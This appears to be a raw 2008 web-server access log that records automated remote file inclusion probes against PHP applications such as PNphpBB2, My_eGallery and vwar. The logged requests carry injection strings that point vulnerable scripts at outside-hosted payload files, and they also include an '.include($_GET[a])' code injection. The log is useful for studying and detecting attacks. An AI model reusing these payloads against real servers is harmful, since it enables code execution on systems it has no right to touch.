89.108.66.188 - - [07/Sep/2008:08:36:51 -0400] "GET /log/sdaglobal.org-access_log/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 319
89.108.66.188 - - [07/Sep/2008:08:36:51 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 290
89.108.66.188 - - [07/Sep/2008:08:36:51 -0400] "GET /log/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 294
89.108.66.188 - - [07/Sep/2008:08:36:54 -0400] "GET /log/sdaglobal.org-access_log/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 319
89.108.66.188 - - [07/Sep/2008:08:36:54 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 290
89.108.66.188 - - [07/Sep/2008:08:36:54 -0400] "GET /log/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 294
202.123.216.231 - - [07/Sep/2008:08:37:10 -0400] "GET /log/sdaglobal.org-access_log.1//vwar/convert/errors.php?error=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 336
72.55.156.116 - - [07/Sep/2008:08:38:32 -0400] "GET /log/sdaglobal.org-access_log.1/phphtml.php?htmlclass_path=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 323
72.55.156.116 - - [07/Sep/2008:08:38:32 -0400] "GET /phphtml.php?htmlclass_path=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 292
72.55.156.116 - - [07/Sep/2008:08:38:32 -0400] "GET /log/phphtml.php?htmlclass_path=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 296
72.55.156.116 - - [07/Sep/2008:08:38:32 -0400] "GET /log/sdaglobal.org-error_log.3/phphtml.php?htmlclass_path=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 322
89.108.66.188 - - [07/Sep/2008:08:39:22 -0400] "GET /log/sdaglobal.org-access_log.1/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 321
89.108.66.188 - - [07/Sep/2008:08:39:22 -0400] "GET /log/sdaglobal.org-access_log.1/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 321
74.6.22.103 - - [07/Sep/2008:08:38:50 -0400] "GET /log/sdaglobal.org-access_log.3 HTTP/1.0" 200 6054321
89.108.67.204 - - [07/Sep/2008:08:41:00 -0400] "GET /log/sdaglobal.org-error_log//modules/My_eGallery/public/displayCategory.php?basepath=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 356
67.15.80.42 - - [07/Sep/2008:08:42:39 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 320
67.15.80.42 - - [07/Sep/2008:08:42:39 -0400] "GET /errors.php?error=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 291
67.15.80.42 - - [07/Sep/2008:08:42:41 -0400] "GET /log/errors.php?error=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 295
67.15.80.42 - - [07/Sep/2008:08:42:44 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 320
67.15.80.42 - - [07/Sep/2008:08:42:44 -0400] "GET /errors.php?error=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 291
67.15.80.42 - - [07/Sep/2008:08:42:46 -0400] "GET /log/errors.php?error=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 295
67.15.80.42 - - [07/Sep/2008:08:42:49 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 322
67.15.80.42 - - [07/Sep/2008:08:42:53 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 322
81.171.86.86 - - [07/Sep/2008:08:45:13 -0400] "GET /log/sdaglobal.org-access_log.1/modules/My_eGallery/index.php?basepath=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 341 81.171.86.86 - - [